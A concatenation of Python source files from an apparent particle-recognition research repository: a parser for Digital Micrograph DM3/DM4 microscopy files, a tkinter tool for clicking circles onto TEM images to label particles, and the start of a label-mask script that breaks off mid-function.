This\nis critical to maintain good performance when the file resides in a parallel file\nsystem (PFS) because latency of seek operations in PFSs is very high.\n\"\"\"\n\nimport mmap\nfrom os import stat as fileStats\nimport os\nfrom os.path import basename as osBasename\n\nimport numpy as np\n\n\nclass fileDM:\n    def __init__(self, filename, verbose = False, on_memory=False):\n        '''Init opening the file and reading in the header.\n\n        Args:\n            filename: string pointing to the filesystem location of the file.\n            verbose: if True, debug information is printed.\n            on_memory: if True, file data is pre-loaded in memory and all data\n                parsing is performed against memory. Use this mode if the file\n                is in a network based or parallel file system.\n        '''\n\n        self.filename = filename\n\n        # necessary declarations, if something fails\n        self.fid = None\n        self.fidOut = None\n\n        self._on_memory = on_memory\n\n        # check for string\n        if not isinstance(filename, str):\n            raise TypeError('Filename is supposed to be a string')\n\n        #Add a top level variable to indicate verbose output for debugging\n        self.v = verbose\n\n        # try opening the file\n        try:\n            if not self._on_memory:\n                self.fid = open(filename, 'rb')\n            if self._on_memory:\n                self._buffer_offset = 0\n                # Pre-load the file as a memory map that supports operations\n                # similar to a file.\n                with open(filename, 'rb') as _fid:\n                    if os.name == 'nt':\n                        self.fid=mmap.mmap(_fid.fileno(), 0,\n                            access=mmap.ACCESS_READ)\n                    else:\n                        self.fid=mmap.mmap(_fid.fileno(), 0,\n                            prot=mmap.PROT_READ) #, flags=mmap.MAP_PRIVATE)\n                self._buffer_size=fileStats(filename).st_size\n\n        except IOError:\n            print('Error reading file: \"{}\"'.format(filename))\n            raise\n        except:\n            raise\n\n        if not self._validDM():\n            #print('Not a valid DM3 or DM4 file: \"{}\"'.format(filename))\n            raise IOError('Can not read file: {}'.format(filename))\n\n        #Lists that will contain information about binary data arrays\n        self.xSize = []\n        self.ySize = []\n        self.zSize = []\n        self.zSize2 = [] #only used for 4D datasets in DM4 files\n        self.dataType = []\n        self.dataSize = []\n        self.dataOffset = []\n        self.dataShape = [] #1,2,3, or 4. 
The total number of dimensions in a data set\n\n #The number of objects found in the DM3 file\n self.numObjects = 0\n\n #Indicator that a thumbnail exists (tested for later)\n self.thumbnail = False\n\n self.curGroupLevel = 0 #track how deep we currently are in a group\n self.maxDepth = 64 #maximum number of group levels allowed\n self.curGroupAtLevelX = np.zeros((self.maxDepth,),dtype=np.int8) #track group at current level\n self.curGroupNameAtLevelX = '' #set the name of the root group\n\n self.curTagAtLevelX = np.zeros((self.maxDepth,),dtype=np.int8) #track tag number at the current level\n self.curTagName = '' #string of the current tag\n\n #lists that will contain scale information (pixel size)\n self.scale = []\n self.scaleUnit = []\n self.origin = []\n self.dataType = []\n\n #Temporary variables to keep in case a tag entry shows useful information in an array\n self.scale_temp = 0\n self.origin_temp = 0\n\n self.outputDic = {}\n self.allTags = {}\n\n def __del__(self):\n #close the file\n if(not self._on_memory and self.fid):\n if self.v:\n print('Closing input file: {}'.format(self.filename))\n self.fid.close()\n if(self.fidOut):\n if self.v:\n print('Closing tags output file')\n self.fidOut.close()\n\n def tell(self):\n if self._on_memory:\n return self._buffer_offset\n else:\n return self.fid.tell()\n\n def fromfile(self, *args, **kwargs):\n \"\"\" Reads data from a file or momery map.\n Calls np.fromfile and np.frombuffer depending on the on_memory mode of\n the fileDM.\n\n Args, it supports whatever frombuffer, fromfile support but it requires:\n dtype: np.dtype (object or string) to be read.\n count: number of dtype items to be read.\n\n Returns: A list of count dtype elements.\n \"\"\"\n if self._on_memory:\n if \"dtype\" not in kwargs:\n raise ValueError(\"In on_memory mode, reads require always a\"\n \" named dtype argument to be specified.\")\n if \"count\" not in kwargs:\n raise ValueError(\"In on_memory mode, reads require always a\"\n \" named count argument to be specified.\")\n\n dtype=np.dtype(kwargs[\"dtype\"])\n count=int(kwargs[\"count\"])\n kwargs[\"offset\"]=self._buffer_offset\n self._buffer_offset+=int(dtype.itemsize)*count\n return np.frombuffer(*args, **kwargs)\n else:\n return np.fromfile(*args, **kwargs)\n\n def seek(self, fid, offset, from_what=0):\n \"\"\"Positions the reading head for fid. fid can be a file or memory map.\n Follows the same convention as file.seek\n\n Args:\n fid: file or memory map.\n offset: number of bytes to move the head forward (positive value)\n or backwards (negative value).\n from_what: reference point to use in the head movement. 
0:\n for beginning of the file (default behavior), 1: from the\n current head position, and 2: from the end of the file.\n \"\"\"\n if self._on_memory:\n offset=int(offset)\n if from_what==0:\n self._buffer_offset=offset\n elif from_what==1:\n self._buffer_offset+=offset\n elif from_what==2:\n self._buffer_offset=self._buffer_size+offset-1\n else:\n raise ValueError(\"Unkown from_what value: {}\".format(from_what))\n if self._buffer_offset<0:\n raise ValueError(\"Resulting head position cannot be negative.\")\n else:\n return fid.seek(offset, from_what)\n\n\n def _validDM(self):\n '''Test whether a file is a valid DM3 or DM4 file and written in Little Endian format\n '''\n output = True #output will stay == 1 if the file is a true DM4 file\n\n self.dmType = self.fromfile(self.fid,dtype=np.dtype('>u4'),count=1)[0] #file type: == 3 for DM3 or == 4 for DM4\n\n if self.v:\n print('validDM: DM file type numer = {}'.format(self.dmType))\n\n if self.dmType == 3:\n self.specialType = np.dtype('>u4') #uint32\n elif self.dmType == 4:\n self.specialType = np.dtype('>u8') #uint64\n else:\n raise IOError('File is not a valid DM3 or DM4')\n output = False\n\n self.fileSize = self.fromfile(self.fid,dtype=self.specialType,count=1)[0] #file size: real size - 24 bytes\n self.endianType = self.fromfile(self.fid,dtype=np.dtype('>u4'),count=1)[0] #endian type: 1 == little endian (Intel), 2 == big endian (old powerPC Mac)\n\n if self.endianType != 1:\n #print('File is not written Little Endian (PC) format and can not be read by this program.')\n raise IOError('File is not written Little Endian (PC) format and can not be read by this program.')\n output = False\n\n #Test file size for corruption. Note that DM3/DM4 file size is always off by 20/24 bytes from what is written in the header\n osSize = fileStats(self.filename).st_size\n if self.dmType == 3:\n if self.fileSize != osSize-20:\n pass\n #raise IOError('File size on disk ({}) does not match expected file size in header ({}). Invalid file.'.format(osSize, self.fileSize))\n #output = False\n #print('Warning: file size on disk ({}) does not match expected file size in header ({}).'.format(osSize, self.fileSize))\n elif self.dmType == 4:\n if self.fileSize != osSize-24:\n pass\n #raise IOError('File size on disk ({}) does not match expected file size in header ({}). Invalid file.'.format(osSize, self.fileSize))\n #output = False\n #print('Warning: file size on disk ({}) does not match expected file size in header ({}).'.format(osSize, self.fileSize))\n\n return output\n\n def parseHeader(self):\n '''Parse the header by simply reading the root tag group. This ensures the file pointer is in the correct place.\n '''\n #skip the bytes read by dmType\n if self.dmType == 3:\n self.seek(self.fid, 12,0)\n elif self.dmType == 4:\n self.seek(self.fid, 16,0)\n #Read the first root tag the same as any other group\n self._readTagGroup()\n\n #Check for thumbnail\n if(len(self.dataType) > 0): #check that any data set was found\n if( (self.dataType[0] == 23) & (self.dataShape[0] == 2) ):\n self.thumbnail = True\n else:\n self.thumbnail = False\n else: #this file only contains tags (such as a GTG file)\n self.thumbnail = False\n\n def _readTagGroup(self):\n '''Read a tag group in a DM file\n '''\n self.curGroupLevel += 1\n #Check to see if the maximum group level is reached.\n if self.curGroupLevel > self.maxDepth:\n raise IOError('Maximum tag group depth of {} reached. 
This file is most likely corrupt.'.format(self.maxDepth))\n\n self.curGroupAtLevelX[self.curGroupLevel] = self.curGroupAtLevelX[self.curGroupLevel] + 1\n self.curTagAtLevelX[self.curGroupLevel] = 0\n self.fromfile(self.fid,dtype='<i1',count=2) #is open and is sorted?\n nTags = self.fromfile(self.fid,dtype=self.specialType,count=1)[0] #needs to be read as Big Endian (.byteswap() could also work)\n\n if self.v:\n print('Total number of root tags = {}'.format(nTags))\n\n #Iterate of the number of tag entries\n oldTotalTag = self.curGroupNameAtLevelX\n for ii in range(0,nTags):\n self._readTagEntry()\n\n #Go back down a level after reading all entries\n self.curGroupLevel -= 1\n self.curGroupNameAtLevelX = oldTotalTag\n\n def _readTagEntry(self):\n '''Read one entry in a tag group\n '''\n dataType = self.fromfile(self.fid,dtype=np.dtype('>u1'),count=1)[0]\n\n #Record tag at this level\n self.curTagAtLevelX[self.curGroupLevel] += 1\n\n #get the tag\n lenTagLabel = self.fromfile(self.fid,dtype='>u2',count=1)[0]\n\n if self.v:\n print('_readTagEntry: dataType = {}, lenTagLabel = {}'.format(dataType,lenTagLabel))\n\n if lenTagLabel > 0:\n tagLabelBinary = self.fromfile(self.fid,dtype='<u1',count=lenTagLabel) #read as binary\n tagLabel = self._bin2str(tagLabelBinary)\n if self.v:\n print('_readTagEntry: tagLabel = {}'.format(tagLabel))\n else:\n tagLabel = str(self.curTagAtLevelX[self.curGroupLevel]) #unlabeled tag.\n\n #Save the current group name in case this is needed\n oldGroupName = self.curGroupNameAtLevelX\n\n if dataType == 21:\n #This tag entry contains data\n self.curTagName = tagLabel #save its name\n self._readTagType()\n else:\n #This is a nested tag group\n self.curGroupNameAtLevelX += '.' + tagLabel #add to group names\n\n #An unknown part of the DM4 tags\n if self.dmType == 4:\n temp1 = self.fromfile(self.fid,dtype=self.specialType,count=1)[0]\n\n self._readTagGroup()\n\n self.curGroupNameAtLevelX = oldGroupName\n\n def _readTagType(self):\n #Need to read 8 bytes before %%%% delimiater. Unknown part of DM4 tag structure\n if self.dmType == 4:\n temp1 = self.fromfile(self.fid,dtype=self.specialType,count=1)[0]\n\n delim = self.fromfile(self.fid,dtype='<i1',count=4)\n assert((delim == 37).all()) #delim has to be [37,37,37,37] which is %%%% in ASCII.\n if self.v:\n print('_readTagType: should be %%%% = {}'.format(self._bin2str(delim)))\n\n nInTag = self.fromfile(self.fid,dtype=self.specialType,count=1)[0] #nInTag: unnecessary redundant info\n\n #Determine the type of the data in the tag\n #specifies data type: int8, uint16, float32, etc.\n encodedType = self.fromfile(self.fid,dtype=self.specialType,count=1)[0] #big endian\n\n etSize = self._encodedTypeSize(encodedType)\n\n if etSize > 0:\n #regular data. Read it and store it with the tag name\n if self.v:\n print('regular')\n self._storeTag(self.curTagName, self._readNativeData(encodedType))\n elif encodedType == 18: #string\n if self.v:\n print('string')\n stringSize = self.fromfile(self.fid,dtype='>u4',count=1)[0]\n #strtemp = '' #in case stringSize == 0\n strTempBin = self.fromfile(self.fid,dtype='<u1',count=stringSize) #read as uint8 little endian\n strTemp = self._bin2str(strTempBin)\n self._storeTag(self.curTagName,strTemp)\n elif encodedType == 15: #struct\n #This does not work for field names that are non-zero. 
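(_readStructTypes reads each field's nameLength but never consumes the name bytes themselves.) 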
This is uncommon\n if self.v:\n print('struct')\n structTypes = self._readStructTypes()\n structs = self._readStructData(structTypes)\n self._storeTag(self.curTagName,structs)\n elif encodedType == 20: #array\n #The array data is not read. It will be read later if needed\n if self.v:\n print('array')\n arrayTypes = self._readArrayTypes() #could be recursive if array contains array(s)\n arrInfo = self._readArrayData(arrayTypes) #only info of the array is read. It is read later if needed\n self._storeTag(self.curTagName,arrInfo)\n\n def _bin2str(self,bin):\n '''Utility function to convert a numpy array of binary values to a python string\n '''\n return ''.join([chr(item) for item in bin])\n\n def _encodedTypeSize(self, encodedType):\n '''Return the number of bytes in a data type for the encodings used by DM\n Constants for the different encoded data types used in DM3 files\n SHORT = 2\n LONG = 3\n USHORT = 4\n ULONG = 5\n FLOAT = 6\n DOUBLE = 7\n BOOLEAN = 8\n CHAR = 9\n OCTET = 10\n uint64 = 12\n -1 will signal an unlisted type\n '''\n if encodedType == 0:\n return 0\n elif (encodedType == 8) | (encodedType == 9) | (encodedType == 10):\n return 1 #1 byte\n elif (encodedType == 2) | (encodedType == 4):\n return 2 #2 bytes\n elif (encodedType == 3) | (encodedType == 5) | (encodedType == 6):\n return 4 #4 bytes\n elif (encodedType == 7) | (encodedType == 12):\n return 8 #8 bytes\n else:\n return -1\n\n def _encodedTypeDtype(self,encodedType):\n '''Translate the encodings used by DM to numpy dtypes according to:\n SHORT = 2\n LONG = 3\n USHORT = 4\n ULONG = 5\n FLOAT = 6\n DOUBLE = 7\n BOOLEAN = 8\n CHAR = 9\n OCTET = 10\n uint64 = 12\n -1 will signal an unlisted type\n '''\n if encodedType == 2:\n return np.dtype('<i2')\n elif encodedType == 3:\n return np.dtype('<i4')\n elif encodedType == 4:\n return np.dtype('<u2')\n elif encodedType == 5:\n return np.dtype('<u4')\n elif encodedType == 6:\n return np.dtype('<f4')\n elif encodedType == 7:\n return np.dtype('<f8')\n elif encodedType == 8:\n return np.dtype('<u1')\n elif encodedType == 9:\n return np.dtype('<u1')\n elif encodedType == 10:\n return np.dtype('<u1')\n elif encodedType == 12:\n return np.dtype('<u8')\n else:\n return -1\n\n def _readStructTypes(self):\n '''Analyze the types of data in a struct\n '''\n structNameLength = self.fromfile(self.fid,count=1,dtype=self.specialType)[0] #this is not needed\n nFields = self.fromfile(self.fid,count=1,dtype=self.specialType)[0]\n if self.v:\n print('_readStructTypes: nFields = {}'.format(nFields))\n\n if(nFields > 100):\n raise RuntimeError('Too many fields in a struct.')\n\n fieldTypes = np.zeros(nFields)\n for ii in range(0,nFields):\n aa = self.fromfile(self.fid,dtype=self.specialType,count=2) #nameLength, fieldType\n nameLength = aa[0] #not used currently\n fieldTypes[ii] = aa[1]\n return fieldTypes\n\n def _readStructData(self,structTypes):\n '''Read the data in a struct\n '''\n struct = np.zeros(structTypes.shape[0])\n for ii, encodedType in enumerate(structTypes):\n etSize = self._encodedTypeSize(encodedType) #the size of the data type\n struct[ii] = self._readNativeData(encodedType) #read this type of data\n return struct\n\n def _readNativeData(self,encodedType):\n '''reads ordinary data types in tags\n SHORT (int16) = 2;\n LONG (int32) = 3;\n USHORT (uint16) = 4;\n ULONG (uint32) = 5;\n FLOAT (float32) = 6;\n DOUBLE (float64) = 7;\n BOOLEAN (bool) = 8;\n CHAR (uint8 character) = 9;\n OCTET (??) 
= 10;\n        UINT64 (uint64) = 11;\n        '''\n        if encodedType == 2:\n            val = self.fromfile(self.fid,count=1,dtype='<i2')[0]\n        elif encodedType == 3:\n            val = self.fromfile(self.fid,count=1,dtype='<i4')[0]\n        elif encodedType == 4:\n            val = self.fromfile(self.fid,count=1,dtype='<u2')[0]\n        elif encodedType == 5:\n            val = self.fromfile(self.fid,count=1,dtype='<u4')[0]\n        elif encodedType == 6:\n            val = self.fromfile(self.fid,count=1,dtype='<f4')[0]\n        elif encodedType == 7:\n            val = self.fromfile(self.fid,count=1,dtype='<f8')[0]\n        elif encodedType == 8: #matlab uchar\n            val = self.fromfile(self.fid,count=1,dtype='<u1')[0] #return character or number?\n            if self.v:\n                print('_readNativeData untested type, val: {}, {}'.format(encodedType,val))\n        elif encodedType == 9: #matlab *char\n            val = self.fromfile(self.fid,count=1,dtype='<i1')[0] #return character or number?\n            if self.v:\n                print('_readNativeData untested type, val: {}, {}'.format(encodedType,val))\n        elif encodedType == 10: #matlab *char\n            val = self.fromfile(self.fid,count=1,dtype='<i1')[0]\n            if self.v:\n                print('_readNativeData untested type, val: {}, {}'.format(encodedType,val))\n        elif encodedType == 11:\n            val = self.fromfile(self.fid,count=1,dtype='<u8')[0]\n        elif encodedType == 12:\n            val = self.fromfile(self.fid,count=1,dtype='<u8')[0] #unknown type, but this works\n        else:\n            raise IOError('_readNativeData unknown data type: {}'.format(encodedType))\n\n        if self.v:\n            print('_readNativeData: encodedType == {} and val = {}'.format(encodedType, val))\n\n        return val\n\n    def _readArrayTypes(self):\n        '''Analyze the types of data in an array\n        '''\n        arrayType = self.fromfile(self.fid,dtype=self.specialType,count=1)[0]\n\n        itemTypes = []\n\n        if arrayType == 15:\n            #nested Struct\n            itemTypes = self._readStructTypes()\n        elif arrayType == 20:\n            #Nested array\n            itemTypes = self._readArrayTypes()\n        else:\n            itemTypes.append(arrayType)\n        if self.v:\n            print('_readArrayTypes: itemTypes = {}'.format(itemTypes))\n        return itemTypes\n\n    def _readArrayData(self,arrayTypes):\n        '''Read information in an array based on the types provided. Binary data is not read at this point.\n        '''\n\n        #The number of elements in the array\n        arraySize = self.fromfile(self.fid,count=1,dtype=self.specialType)[0]\n\n        if self.v:\n            print('_readArrayData: arraySize, arrayTypes = {}, {}'.format(arraySize,arrayTypes))\n\n        #Everything used to calculate the bufSize is not needed anymore. This can be removed after testing\n        itemSize = 0\n        for encodedType in arrayTypes:\n            if self.v:\n                print('_readArrayData: encodedType = {}'.format(encodedType))\n            etSize = self._encodedTypeSize(encodedType)\n            itemSize += etSize\n\n        bufSize = arraySize * itemSize\n        bufSize = bufSize.astype('<u8') #change to an integer\n\n        if self.v:\n            print('_readArrayData: arraySize, itemSize = {}, {}'.format(arraySize, itemSize))\n\n        if self.curTagName == 'Data':\n            #This is a binary array. Save its location to read later if needed\n            self._storeTag(self.curTagName + '.arraySize', bufSize)\n            self._storeTag(self.curTagName + '.arrayOffset', self.tell())\n            self._storeTag(self.curTagName + '.arrayType', encodedType)\n            self.seek(self.fid, bufSize.astype('<u8'),1) #advance the pointer by bufsize from current position\n            arrOut = 'Data unread. 
Encoded type = {}'.format(encodedType)\n elif bufSize < 1e3: #set an upper limit on the size of array that will be read in as a string\n #treat as a string\n for encodedType in arrayTypes:\n stringData = self.fromfile(self.fid,count=arraySize,dtype=self._encodedTypeDtype(encodedType))\n arrOut = self._bin2str(stringData)\n\n #This is the old way to read this in. Its not really correct though.\n #stringData = self.bin2str(self.fromfile(self.fid,count=bufSize,dtype='<u1'))\n #arrOut = stringData.replace('\\x00','') #remove all spaces from the string data\n\n #Catch useful tags for images and spectra (nm, eV, etc.)\n fullTagName = self.curGroupNameAtLevelX + '.' + self.curTagName\n if((fullTagName.find('Dimension') > -1) & (fullTagName.find('Units') > -1) ):# & (self.numObjects > 0)):\n self.scale.append(self.scale_temp)\n self.scaleUnit.append(arrOut)\n self.origin.append(self.origin_temp)\n else:\n self._storeTag(self.curTagName + '.arraySize', bufSize)\n self._storeTag(self.curTagName + '.arrayOffset', self.tell())\n self._storeTag(self.curTagName + '.arrayType', encodedType)\n self.seek(self.fid, bufSize.astype('<u8'),1) #advance the pointer by bufsize from current position\n arrOut = 'Array unread. Encoded type = {}'.format(encodedType)\n\n return arrOut\n\n def _storeTag(self,curTagName,curTagValue):\n '''Builds the full tag name and key/value pair as text. Also calls another\n function to catch useful tags and values. Also saves all tags in a dictionary.\n '''\n #Build the full tag name (key) and add the tag value\n if self.v:\n print('_storeTag: curTagName, curTagValue = {}, {}'.format(curTagName,curTagValue))\n totalTag = self.curGroupNameAtLevelX + '.' + '{}'.format(curTagName) #+ '= {}'.format(curTagValue)\n\n self._catchUsefulTags(totalTag,curTagName,curTagValue)\n\n self.allTags[totalTag] = curTagValue #this needs to be done better.\n\n return(totalTag)\n\n def _catchUsefulTags(self,totalTag,curTagName,curTagValue):\n '''Find interesting keys and keep their values for later. 
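Data offsets, sizes, types, dimensions, and pixel scale/origin values are collected here. 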
This is separate from _storeTag\n so that it is easy to find and modify.\n '''\n\n #Save that a useful object has been found\n if totalTag.find('ImageData.Calibrations.Dimension.1.Scale')>-1:\n self.numObjects += 1 #data is contained in this file\n\n if curTagName.find('Data.arraySize')>-1:\n self.dataSize.append(curTagValue)\n elif curTagName.find('Data.arrayOffset') >-1:\n self.dataOffset.append(curTagValue)\n elif curTagName.find('DataType')>-1:\n self.dataType.append(curTagValue)\n elif totalTag.find('Dimensions.1')>-1:\n self.xSize.append(curTagValue)\n self.ySize.append(1)\n self.zSize.append(1)\n self.zSize2.append(1)\n self.dataShape.append(1) # indicate as at least 1D data\n elif totalTag.find('Dimensions.2')>-1:\n self.ySize[-1] = curTagValue #OR self.ysize[self.numObjects] = self.curTagValue\n self.dataShape[-1] = 2 # indicate as at least 2D data\n elif totalTag.find('Dimensions.3')>-1:\n self.zSize[-1] = curTagValue\n self.dataShape[-1] = 3 # indicate as at least 3D data\n elif totalTag.find('Dimensions.4')>-1:\n self.zSize2[-1] = curTagValue\n self.dataShape[-1] = 4 # indicate as at least 3D data\n elif (totalTag.find('Dimension.')>-1) & (totalTag.find('.Scale')>-1):\n self.scale_temp = curTagValue\n elif (totalTag.find('Dimension.')>-1) & (totalTag.find('.Origin')>-1):\n self.origin_temp = curTagValue\n else:\n pass\n\n def writeTags(self):\n fnameOutPrefix = self.filename.split('.dm3')[0]\n try:\n #open a text file to write out the tags\n with open(fnameOutPrefix+'_tags.txt','w') as fidOut:\n for nn in sorted(self.allTags):\n try:\n oo = '{} = {}'.format(nn,str(self.allTags[nn]))\n fidOut.write(oo)\n except:\n fidOut.write('{} = dm.py error'.format(nn))\n fidOut.write('\\n')\n fidOut.close() #this might not be necessary\n except NameError:\n print(\"Issue opening tags output file.\")\n raise\n except:\n raise\n\n def _checkIndex(self, i):\n '''Check index i for sanity, otherwise raise Exception.\n\n Parameters:\n i (int): Index.\n\n '''\n\n # check type\n if not isinstance(i, int):\n raise TypeError('index supposed to be integer')\n\n # check whether in range\n if i < 0 or i > self.numObjects:\n raise IndexError('Index out of range, trying to access element {} of {} valid elements'.format(i+1, self.head['ValidNumberElements']))\n\n return\n\n def _DM2NPDataType(self, dd):\n '''Convert the DM data type value into a numpy dtype\n '''\n if dd == 6:\n return np.uint8\n elif dd == 10:\n return np.uint16\n elif dd == 11:\n return np.uint32\n elif dd == 9:\n return np.int8\n elif dd == 1:\n return np.int16\n elif dd == 7:\n return np.int32\n elif dd == 2:\n return np.float32\n elif dd == 12:\n return np.float64\n #elif dd == 14: #this is supposed to be bit1 in matlab, but Im not sure what that translates to in numpy\n # return np.uint8 #bit1 ??\n elif dd == 3:\n return np.complex64\n elif dd == 13:\n return np.complex128\n elif dd == 23:\n raise IOError('RGB data type is not supported yet.')\n #return np.uint8\n else:\n print(\"4321\")\n raise IOError('Unsupported binary data type during conversion to numpy dtype. DM dataType == {}'.format(dd))\n\n def getDataset(self, index):\n '''Retrieve a dataset from the DM file.\n Note: Most DM3 and DM4 files contain a small \"thumbnail\" as the first dataset written as RGB data. This function ignores that dataset if it exists. To retrieve the thumbnail use the getThumbnail() function\n '''\n #The first dataset is usually a thumbnail. 
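(It is written as RGB data; see getThumbnail below.) 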
Test for this and skip the thumbnail automatically\n if self.numObjects == 1:\n ii = index\n else:\n ii = index + 1\n\n #Check that the dataset exists.\n try:\n self._checkIndex(ii)\n except:\n raise\n\n self.seek(self.fid, self.dataOffset[ii],0) #Seek to start of dataset from beginning of the file\n\n outputDict = {}\n\n outputDict['filename'] = osBasename(self.filename)\n\n #Parse the dataset to see what type it is (image, image series, spectra, etc.)\n if self.xSize[ii] > 0:\n pixelCount = self.xSize[ii]*self.ySize[ii]*self.zSize[ii]*self.zSize2[ii]\n jj = 0 #counter to determine where the first scale value starts\n for nn in self.dataShape[0:ii]:\n jj += nn #sum up all number of dimensions for previous datasets\n #if self.dataType == 23: #RGB image(s)\n # temp = self.fromfile(self.fid,count=pixelCount,dtype=np.uint8).reshape(self.ysize[ii],self.xsize[ii])\n if self.zSize[ii] == 1: #2D data\n outputDict['data'] = self.fromfile(self.fid,count=pixelCount,dtype=self._DM2NPDataType(self.dataType[ii])).reshape((self.ySize[ii],self.xSize[ii]))\n outputDict['pixelUnit'] = self.scaleUnit[jj:jj+self.dataShape[ii]][::-1] #need to reverse the order to match the C-ordering of the data\n outputDict['pixelSize'] = self.scale[jj:jj+self.dataShape[ii]][::-1]\n outputDict['pixelOrigin'] = self.origin[jj:jj+self.dataShape[ii]][::-1]\n elif self.zSize2[ii] > 1: #4D data\n outputDict['data'] = self.fromfile(self.fid,count=pixelCount,dtype=self._DM2NPDataType(self.dataType[ii])).reshape((self.zSize2[ii],self.zSize[ii],self.ySize[ii],self.xSize[ii]))\n outputDict['pixelUnit'] = self.scaleUnit[jj:jj+self.dataShape[ii]][::-1] #need to reverse the order to match the C-ordering of the data\n outputDict['pixelSize'] = self.scale[jj:jj+self.dataShape[ii]][::-1]\n outputDict['pixelOrigin'] = self.origin[jj:jj+self.dataShape[ii]][::-1]\n else: #3D array\n outputDict['data'] = self.fromfile(self.fid,count=pixelCount,dtype=self._DM2NPDataType(self.dataType[ii])).reshape((self.zSize[ii],self.ySize[ii],self.xSize[ii]))\n outputDict['pixelUnit'] = self.scaleUnit[jj:jj+self.dataShape[ii]][::-1] #need to reverse the order to match the C-ordering of the data\n outputDict['pixelSize'] = self.scale[jj:jj+self.dataShape[ii]][::-1]\n outputDict['pixelOrigin'] = self.origin[jj:jj+self.dataShape[ii]][::-1]\n\n return outputDict\n\n def _readRGB(self,xSizeRGB,ySizeRGB):\n '''Read in a uint8 type array with [Red,green,blue,alpha] channels.\n '''\n return self.fromfile(self.fid,count=xSizeRGB*ySizeRGB*4,dtype='<u1').reshape(xSizeRGB,ySizeRGB,4)\n\n def getThumbnail(self):\n '''Read the thumbnail saved as the first dataset in the DM file as an RGB array\n Unsure if this is correct.\n '''\n self.seek(self.fid, self.dataOffset[0],0)\n return self._readRGB(self.ySize[0],self.xSize[0])\n\ndef dmReader(fName,dSetNum=0,verbose=False):\n '''Simple function to parse the file and read the requested dataset\n '''\n f1 = fileDM(fName,verbose) #open the file and init the class\n f1.parseHeader() #parse the header\n im1 = f1.getDataset(dSetNum) #get the requested dataset (first by default)\n del f1 #delete the class and close the file\n return im1 #return the dataset and metadata as a dictionary\n" }, { "alpha_fraction": 0.5828651785850525, "alphanum_fraction": 0.6095505356788635, "avg_line_length": 33.24038314819336, "blob_id": "6073384c870ac7ef686f02e24c94283e49392db1", "content_id": "7bb1363a0ccfc2649423b9e498670302992409b3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3560, 
"license_type": "no_license", "max_line_length": 165, "num_lines": 104, "path": "/label_data_gui/learning_tkinter_addImg.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "# Basic Animation Framework\n\nfrom tkinter import *\nfrom PIL import Image, ImageTk\n\n\n####################################\n# customize these functions\n####################################\n\n# Adds shapes on mouse clicks and deletes them on pressing 'd'\ndef init(data):\n data.circleCenters = [ ]\n data.recordCircleCenters = [ ]\n data.radii = [ ]\n\ndef mousePressed(event, data,canvas):\n newCircleCenter = (event.x, event.y)\n recordCircleCenter = (canvas.canvasx(event.x),canvas.canvasy(event.y))\n data.circleCenters.append(newCircleCenter)\n data.recordCircleCenters.append(recordCircleCenter)\n data.radii.append(data.radius)\n\ndef keyPressed(event, data):\n if (event.char == \"d\"):\n if (len(data.circleCenters) > 0):\n data.circleCenters.pop(0)\n else:\n print(\"No more circles to delete!\")\n if event.keysym == \"Up\":\n data.radius += 2\n data.radii.pop()\n data.radii.append(data.radius)\n if event.keysym == \"Down\":\n data.radius -= 2\n data.radii.pop()\n data.radii.append(data.radius)\n\ndef redrawAll(canvas, data,photo):\n #draw the photo\n canvas.create_image(0,0,image = photo,anchor = \"nw\")\n # draw the circles\n for idx,circleCenter in enumerate(data.circleCenters):\n (cx, cy) = circleCenter\n canvas.create_oval(cx-data.radii[idx], cy-data.radii[idx], cx+data.radii[idx], cy+data.radii[idx], fill=None, outline = \"magenta\")\n # draw the text\n canvas.create_text(data.width/2, 20,\n text=\"Example: Adding and Deleting Shapes\")\n canvas.create_text(data.width/2, 40,\n text=\"Mouse clicks create circles\")\n canvas.create_text(data.width/2, 60,\n text=\"Pressing 'd' deletes circles\")\n\n####################################\n# use the run function as-is\n####################################\n\ndef run(width=524, height=524):\n def redrawAllWrapper(canvas, data,photo):\n canvas.delete(ALL)\n canvas.create_rectangle(0, 0, data.width, data.height,\n fill='white', width=0)\n redrawAll(canvas, data, photo)\n canvas.update() \n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data, canvas)\n redrawAllWrapper(canvas, data, photo)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data,photo)\n\n # Set up data and call init\n class Struct(object): pass\n data = Struct()\n data.width = width\n data.height = height\n data.radius = 20\n data\n root = Tk()\n init(data)\n image = Image.open('/Users/kategroschner/Box Sync/Research/HR-TEM/20180227/20180227_101729F_prepped20171204/8bit/20180227_101729F_plasma15sec_Mh370kx__0014.tif')\n image = image.resize((512,512), Image.BICUBIC)\n photo = ImageTk.PhotoImage(image)\n #label = Label(image=photo)\n #label.image = photo\n #label.pack()\n # create the root and the canvas\n canvas = Canvas(width=data.width, height=data.height)\n canvas.create_image(0,0,image = photo, anchor = \"nw\")\n canvas.pack()\n # set up events\n root.bind(\"<Button-1>\", lambda event:\n mousePressedWrapper(event, canvas, data))\n root.bind(\"<Key>\", lambda event:\n keyPressedWrapper(event, canvas, data))\n redrawAll(canvas, data, photo)\n # and launch the app\n root.mainloop() # blocks until window is closed\n print(\"bye!\")\n print(data.recordCircleCenters,data.radii)\n\nrun(524, 524)" }, { "alpha_fraction": 0.581632673740387, "alphanum_fraction": 0.5918367505073547, "avg_line_length": 32.25, 
"blob_id": "5747bfe3a8af2df30d6838de7a9d29a777bc17e8", "content_id": "c10462f4b7bf0cafbbd88e3eb57021b981e3c719", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1862, "license_type": "no_license", "max_line_length": 90, "num_lines": 56, "path": "/classfier_builds/labelmask.py", "repo_name": "ckgrosch/particleRecognition", "src_encoding": "UTF-8", "text": "from glob import glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport os\nfrom ast import literal_eval\nimport shutil\n\ndef txt_reader(file):\n txt_info = open(file,'r')\n txt = []\n centers = []\n radii = []\n for line in txt_info:\n if line == '\\n':\n pass\n else:\n line = line.strip('\\n')\n txt.append(line)\n center_stop = txt.index('Radius Size:')\n radius_stop = txt.index('Defect Label:')\n for loc in txt[1:center_stop]:\n centers.append(literal_eval(loc))\n for loc in txt[center_stop+1:radius_stop] :\n radii.append(int(loc))\n image_size = literal_eval(txt[-1])\n return centers, radii, image_size\n\n\ndef spot_maker(location, radius, label_mask):\n for x in np.arange(location[0]-radius,location[0]+radius,1):\n for y in np.arange(location[1]-radius,location[1]+radius,1):\n dx = x - location[0]\n dy 